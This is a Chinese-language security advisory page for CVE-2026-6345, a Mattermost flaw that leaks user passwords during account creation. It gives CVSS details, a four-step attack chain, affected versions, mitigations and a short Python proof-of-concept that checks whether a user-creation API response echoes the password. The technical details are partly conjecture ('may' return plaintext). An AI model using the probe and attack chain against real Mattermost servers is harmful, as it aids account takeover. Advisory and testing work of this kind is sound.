CVE-2026-6345 CVSS 6.5 中危

CVE-2026-6345 Mattermost密码泄露漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6345

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Mattermost

漏洞概述

Mattermost特定版本存在安全漏洞，未能有效防止创建用户时密码的泄露。该漏洞允许恶意攻击者获取部分用户的密码，进而利用这些凭据冒充合法用户。攻击者需具备高权限才能利用此漏洞。受影响的版本包括11.5.x、10.11.x和11.4.x的特定子版本。此问题可能导致严重的账户安全风险，建议用户尽快更新至修复版本以防止潜在的身份伪造攻击。

技术细节

该漏洞的核心在于Mattermost在处理用户创建流程时存在逻辑缺陷，导致本应被哈希处理或隐藏的用户密码在特定响应中泄露。根据描述，受影响版本在创建用户时未能正确过滤敏感信息，可能将明文密码返回给客户端或记录在可被高权限用户访问的日志中。由于CVSS向量包含PR:H（高权限），攻击者通常需要拥有管理员或类似的高级权限才能触发该漏洞。一旦攻击者成功触发了密码泄露，他们即可获得受害者的完整登录凭据。鉴于C:H（高机密性影响）和I:H（高完整性影响），攻击者可以完全接管受害者账户，进行数据窃取、篡改或进一步的内网横向移动，严重威胁系统安全。

攻击链分析

STEP 1

1. 权限获取

攻击者首先需要获取Mattermost系统的高权限账号（如管理员权限），这是利用该漏洞的前提条件（PR:H）。

STEP 2

2. 触发漏洞

攻击者利用高权限账号，通过特定的API接口或管理面板功能创建新用户，或触发涉及用户密码生成的操作。

STEP 3

3. 密码泄露

由于系统漏洞，服务器在响应中意外返回了新创建用户的明文密码或敏感凭据信息。

STEP 4

4. 账户接管

攻击者利用获取到的密码，直接登录受害用户的账户，实现身份冒充和数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # Proof of Concept for CVE-2026-6345 # Description: Demonstrates the potential disclosure of a user password during creation. # Note: This is a conceptual PoC. Actual endpoints may vary. target_url = "https://mattermost.example.com/api/v4/users" auth_token = "Bearer <ADMIN_TOKEN>" # Requires High Privileges (PR:H) headers = { "Authorization": auth_token, "Content-Type": "application/json" } # Payload to create a new user payload = { "email": "[email protected]", "username": "newuser", "password": "SuperSecret123!" } response = requests.post(target_url, headers=headers, json=payload) if response.status_code == 201: data = response.json() # Vulnerability Check: Check if password is returned in the response if "password" in data: print("[!] Vulnerability Confirmed: Password disclosed!") print(f"Leaked Password: {data['password']}") else: print("[*] Password not found in response.") else: print(f"[-] Request failed: {response.status_code}")

影响范围

Mattermost 11.5.x <= 11.5.1

Mattermost 10.11.x <= 10.11.13

Mattermost 11.4.x <= 11.4.3

防御指南

临时缓解措施

如果暂时无法升级，建议立即撤销非必要的高权限账号，并严格监控用户创建日志。对于受影响期间创建的账户，应强制要求用户在下次登录时修改密码，以消除攻击者利用泄露凭据的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6345
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6345
3 Details https://www.cvedetails.com/cve/CVE-2026-6345/
4 VulDB https://vuldb.com/cve/CVE-2026-6345
5 Link https://mattermost.com/security-updates

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表